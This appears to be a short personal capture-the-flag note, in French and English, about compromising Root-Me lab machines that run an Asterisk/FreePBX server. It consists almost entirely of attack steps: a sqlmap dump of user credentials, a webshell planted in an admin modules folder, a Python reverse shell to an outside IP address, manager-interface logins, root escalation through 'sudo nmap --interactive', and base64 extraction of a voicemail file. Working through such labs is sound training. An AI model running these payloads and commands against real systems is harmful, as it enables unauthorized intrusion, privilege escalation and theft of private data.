dump de http://ctf05.root-me.org/admin/cdr/call-log.php avec sqlmap => table ampusers, database asterisk

=> htpasswd :
Support : supersupport666

Support:supersupport666


Upload webshell in modules
=> http://ctf08.root-me.org/admin/modules/webshell/webshell.php?cmd=ls / |sed ':a;N;$!ba;s/\n/<br>/g'
=> http://ctf08.root-me.org/admin/modules/webshell/webshell.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("178.62.222.31",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' | sed ':a;N;$!ba;s/\n/<br>/g';


telnet ctf08.root-me.org 5038
action: login
username: admin
secret: amp111


sudo nmap --interactive
!sh
whoami => root
base64 /var/spool/asterisk/voicemail/default/2000/Old/msg0000.wav > ici



wget http://ctf08.root-me.org/admin/modules/webshell/ici
